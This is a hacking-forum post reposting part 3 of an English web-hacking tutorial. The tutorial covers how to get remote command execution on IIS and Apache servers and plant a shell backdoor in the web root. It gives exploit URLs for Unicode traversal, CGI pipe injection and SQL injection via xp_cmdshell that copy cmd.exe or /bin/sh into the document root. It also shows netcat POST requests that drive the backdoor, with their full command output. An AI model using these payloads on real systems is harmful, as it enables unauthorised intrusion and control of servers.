Y A R B A

Dahaya Dahek Bir Paylaşım Sitesidir!
 
AnasayfaTakvimSSSKayıt OlGiriş yap
Giriş yap
Kullanıcı Adı:
Şifre:
Beni hatırla: 
:: Şifremi unuttum
Kasım 2017
PtsiSalıÇarş.Perş.CumaC.tesiPaz
  12345
6789101112
13141516171819
20212223242526
27282930   
TakvimTakvim

Paylaş | 
 

 Web Hack ( part 3 )

Önceki başlık Sonraki başlık Aşağa gitmek 
YazarMesaj
*-..-* Neruda *-..-*
Admin
Admin
avatar

Mesaj Sayısı : 20
Kayıt tarihi : 02/08/09
Yaş : 29
Nerden : SyRiA

MesajKonu: Web Hack ( part 3 )   Çarş. Ağus. 26 2009, 17:44

Hi
Will be continuo

3.0 Finding the entry point
The one-way hack begins when we are able to achieve remote command execution on the target web server. We can use any of the common techniques used to attack web servers. We shall present a few examples of various ways of achieving remote command execution based on different types of URL mappings as described previously. A detailed discussion on web server and application vulnerabilities is beyond the scope of this paper.

Our objective is to create a backdoor by moving the shell interpreter (/bin/sh, cmd.exe, etc) to an area within the web server's document root. This way, we can invoke the shell interpreter through a URL. We present three examples which illustrate how to create backdoors using various exploitation techniques.

The diagram below illustrates some of the techniques used to find an entry point:




3.0.1 Exploiting URL parsing
The Unicode / Double decode attack is a classic example of a URL parsing vulnerability. The URL below copies the command interpreter - cmd.exe - into the "scripts/" directory within the web server's document root:

http://www1.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+
c:\winnt\system32\cmd.exe+c:\inetpub\scripts


3.0.2 Exploiting poorly validated input parameters
In this example, an unchecked parameter is passed from the URL to a Perl CGI script news.cgi using the open() call in an insecure manner:

http://www2.example.com/cgi-bin/news.cgi?story=101003.txt|cp+/bin/sh+
/usr/local/apache/cgi-bin/sh.cgi|

The shell (/bin/sh) gets copied into the cgi-bin directory as sh.cgi.


3.0.3 Exploiting SQL injection
Here, we show how SQL injection can be used to invoke a stored procedure on a database server, and run commands via the stored procedure:

http://www3.example.com/product.asp?id=5%01EXEC+master..xp_cmdshell+
'copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\'


3.1 Invoking the command interpreter
Our objective of creating a backdoor by moving the command interpreter or the shell into the web document root is to be able to invoke it remotely over HTTP. The HTTP POST method is best suited for this purpose. Using POST, the input data gets passed to the invoked resource over standard input, and the web server returns the output generated by standard output back over the HTTP connection.

We shall illustrate how to send commands to command interpreters over POST, with two examples - one for CMD.EXE on IIS and Windows NT and the other for sh.cgi (which is a copy of /bin/sh) on Apache and Linux.


3.1.1 POSTing commands to CMD.EXE
The example below shows two commands being run with CMD.EXE, which is accessible on http://www1.example.com/scripts/cmd.exe. The POST request is shown in blue letters.

$ nc www1.example.com 80
POST /scripts/cmd.exe HTTP/1.0
Host: www1.example.com
Content-length: 17

ver
dir c:\
exit

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 08 Dec 1999 06:13:19 GMT
Content-Type: application/octet-stream
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\Inetpub\scripts>ver

Windows NT Version 4.0

C:\Inetpub\scripts>dir c:\
Volume in drive C has no label.
Volume Serial Number is E43A-2A0A

Directory of c:\

10/04/00 05:28a <DIR> WINNT
10/04/00 05:31a <DIR> Program Files
10/04/00 05:37a <DIR> TEMP
10/04/00 07:01a <DIR> Inetpub
10/04/00 07:01a <DIR> certs
11/28/00 05:12p <DIR> software
12/06/00 03:46p <DIR> src
12/07/00 12:50p <DIR> weblogic
12/07/00 12:53p <DIR> weblogic_publish
12/07/99 01:11p <DIR> JavaWebServer2.0
12/07/99 06:49p 134,217,728 pagefile.sys
12/07/99 07:24a <DIR> urlscan
12/07/99 04:55a <DIR> Netscape
13 File(s) 134,217,728 bytes
120,782,848 bytes free

C:\Inetpub\scripts>exit
$

Some care needs to be taken in order for CMD.EXE to receive the commands properly, and for the web server to return the output of CMD.EXE properly. In the above example, we have included the "exit" command to ensure that the input stream to CMD.EXE terminates properly. The Content-length of the POST request is also calculated accordingly, keeping in mind the extra characters taken by "exit"


3.1.2 POSTing commands to /bin/sh
The example below shows three commands being run with /bin/sh, which is accessible on http://www2.example.com/cgi-bin/sh.cgi. The POST request is shown in bold letters.

$ nc www2.example.com 80
POST /cgi-bin/sh.cgi HTTP/1.0
Host: www2.example.com
Content-type: text/html
Content-length: 60


echo 'Content-type: text/html'
echo
uname
id
ls -la /
exit

HTTP/1.1 200 OK
Date: Thu, 27 Nov 2003 20:47:20 GMT
Server: Apache/1.3.12
Connection: close
Content-Type: text/html

Linux
uid=99(nobody) gid=99(nobody) groups=99(nobody)
total 116
drwxr-xr-x 19 root root 4096 Feb 2 2002 .
drwxr-xr-x 19 root root 4096 Feb 2 2002 ..
drwxr-xr-x 2 root root 4096 Jun 20 2001 bin
drwxr-xr-x 2 root root 4096 Nov 28 02:01 boot
drwxr-xr-x 6 root root 36864 Nov 28 02:01 dev
drwxr-xr-x 29 root root 4096 Nov 28 02:01 etc
drwxr-xr-x 8 root root 4096 Dec 1 2001 home
drwxr-xr-x 4 root root 4096 Jun 19 2001 lib
drwxr-xr-x 2 root root 16384 Jun 19 2001 lost+found
drwxr-xr-x 4 root root 4096 Jun 19 2001 mnt
drwxr-xr-x 3 root root 4096 Feb 2 2002 opt
dr-xr-xr-x 37 root root 0 Nov 28 2003 proc
drwxr-x--- 9 root root 4096 Feb 9 2003 root
drwxr-xr-x 3 root root 4096 Jun 20 2001 sbin
drwxrwxr-x 2 root root 4096 Feb 2 2002 src
drwxrwxrwt 7 root root 4096 Nov 28 02:01 tmp
drwxr-xr-x 4 root root 4096 Feb 2 2002 u01
drwxr-xr-x 21 root root 4096 Feb 2 2002 usr
drwxr-xr-x 16 root root 4096 Jun 19 2001 var
$

The care and feeding of /bin/sh over Apache is slightly different. Apache expects a well formed HTTP response header from all its CGI programs, hence we have to prepend the lines "Content-type: text/html" in the output. The two "echo" commands are for this purpose.


3.1.3 Automating the POST process
We have created two Perl scripts post_cmd.pl and post_sh.pl to automate the task of preparing the proper POST requests for the commands and sending them to the web server. The syntax for invoking post_cmd.pl is as follows:

usage: post_cmd.pl url [proxy:port] < data
By Saumil Shah (c) net-square 2001

post_cmd.pl takes all the data to be POSTed to the URL as
standard input. Either enter the data manually and hit ^D (unix)
or ^Z (dos) to end; or redirect the data using files or pipes

post_cmd.pl is written such that it can tunnel the POST requests over an HTTP proxy server as well. post_sh.pl is on similar lines.

The examples below show the same results being derived using the Perl scripts instead of forming our own POST requests:


Output of post_cmd.pl
$ ./post_cmd.pl http://www1.example.com/scripts/cmd.exe
ver
dir c:\
^D
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 08 Dec 1999 06:05:46 GMT
Content-Type: application/octet-stream
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\Inetpub\scripts>ver

Windows NT Version 4.0

C:\Inetpub\scripts>dir c:\
Volume in drive C has no label.
Volume Serial Number is E43A-2A0A

Directory of c:\

10/04/00 05:28a <DIR> WINNT
10/04/00 05:31a <DIR> Program Files
10/04/00 05:37a <DIR> TEMP
10/04/00 07:01a <DIR> Inetpub
10/04/00 07:01a <DIR> certs
11/28/00 05:12p <DIR> software
12/06/00 03:46p <DIR> src
12/07/00 12:50p <DIR> weblogic
12/07/00 12:53p <DIR> weblogic_publish
12/07/99 01:11p <DIR> JavaWebServer2.0
12/07/99 06:49p 134,217,728 pagefile.sys
12/07/99 07:24a <DIR> urlscan
12/07/99 04:55a <DIR> Netscape
13 File(s) 134,217,728 bytes
120,782,848 bytes free

C:\Inetpub\scripts>exit
$


Output of post_sh.pl
$ ./post_sh.pl http://www2.example.com/cgi-bin/sh.cgi
uname
id
ls -la /
^D
HTTP/1.1 200 OK
Date: Thu, 27 Nov 2003 20:43:54 GMT
Server: Apache/1.3.12
Connection: close
Content-Type: text/html

Linux
uid=99(nobody) gid=99(nobody) groups=99(nobody)
total 116
drwxr-xr-x 19 root root 4096 Feb 2 2002 .
drwxr-xr-x 19 root root 4096 Feb 2 2002 ..
drwxr-xr-x 2 root root 4096 Jun 20 2001 bin
drwxr-xr-x 2 root root 4096 Nov 28 02:01 boot
drwxr-xr-x 6 root root 36864 Nov 28 02:01 dev
drwxr-xr-x 29 root root 4096 Nov 28 02:01 etc
drwxr-xr-x 8 root root 4096 Dec 1 2001 home
drwxr-xr-x 4 root root 4096 Jun 19 2001 lib
drwxr-xr-x 2 root root 16384 Jun 19 2001 lost+found
drwxr-xr-x 4 root root 4096 Jun 19 2001 mnt
drwxr-xr-x 3 root root 4096 Feb 2 2002 opt
dr-xr-xr-x 37 root root 0 Nov 28 2003 proc
drwxr-x--- 9 root root 4096 Feb 9 2003 root
drwxr-xr-x 3 root root 4096 Jun 20 2001 sbin
drwxrwxr-x 2 root root 4096 Feb 2 2002 src
drwxrwxrwt 7 root root 4096 Nov 28 02:01 tmp
drwxr-xr-x 4 root root 4096 Feb 2 2002 u01
drwxr-xr-x 21 root root 4096 Feb 2 2002 usr
drwxr-xr-x 16 root root 4096 Jun 19 2001 var
$

In this manner, we can issue multiple commands to the target web server using HTTP POST requests. This concept shall be used to create arbitrary files on the web server, as discussed in section 4.1


Created By : *-..-* DaRk EvIl *-..-*
Sayfa başına dön Aşağa gitmek
 
Web Hack ( part 3 )
Önceki başlık Sonraki başlık Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» Beta "Berk Bayındır"( Skeç ) Vatandaşa Sorduk Part 1
» REC 2

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
Y A R B A  :: HACKİNG :: WEB HACK-
Buraya geçin: